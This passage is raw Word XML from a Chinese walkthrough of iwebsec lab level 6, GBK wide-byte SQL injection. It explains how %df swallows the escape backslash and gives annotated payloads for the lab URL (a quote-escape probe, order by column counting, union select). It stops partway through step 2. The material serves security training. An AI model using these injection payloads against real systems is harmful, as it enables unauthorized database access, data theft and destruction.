          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限），可通过注入执行写文件操作（如写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），进而控制整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>服务器，获取服务器控制权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0BBEA5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4.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据破坏：可通过注入执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>delete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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等高危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语句，删除数据库表、篡改业务数据，造成不可挽回的损失。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016387C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第二部分：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">iwebsec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>宽字节注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>完整解析（含报错解决）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="151B0C4B" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>一、漏洞核心信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="72FE2AE9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靶场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶场地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/sqli/06.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FBDCE5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注入类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>宽字节注入（绕过转义的注入方式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC73325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核心特征：利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等宽字节编码的解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>规则，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吞掉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转义符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，使单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>逃逸闭合，篡改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语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6581B97D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常见报错：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\'-- ' LIMIT 0,1' at line 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（已解决）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5BF26C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>二、逐行实操（含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>注释</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>报错解决）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="39A9CF3D" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：判断注入点与列数（基础探测）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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7220A3" w14:paraId="5FD49172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4F7C66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sq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t>l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 xml:space="preserve">-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>探测注入点：访问靶场</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=1%df'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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. id=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：正常查询参数，确保页面正常显示；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. %df</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>宽字节编码的一部分，用于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>吞掉</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>后续的转义符</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 3. '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：单引号，用于尝试闭合</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>语句中的查询条件；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-- 4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>预期结果：页面报错（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL syntax error</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>），说明存在宽字节注入（单引号未被有效转义）。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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>探测列数（判断查询表有多少列，用于后续联合查询）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>ht</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>tp://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=1%df' order by 3--+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lastRenderedPageBreak/>
              <w:t xml:space="preserve">-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. order by 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：按第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>列排序，若页面正常，说明存在第</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>列；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 2. --+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>注释符，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>后面的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>代表空格（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>编码中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>等价于空格），用于注释后续内容；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-- 3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>补充：若输入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id=1%df' order by 4--+ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>页面报错，说明当前查询表只有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>列。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="769C6F8C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>：确定回显位（联合查询前置）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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7220A3" w14:paraId="3AA2BA54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D8C515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sql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>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>靶场地址</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>/sqli/06.php?id=-1%df' union select 1,2,3--+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-- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>逐行注释：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>-- 1. id=-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：让原始查询无结果（数据库中无</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>id=-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>的记录），确保联合查询的结果能显示；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
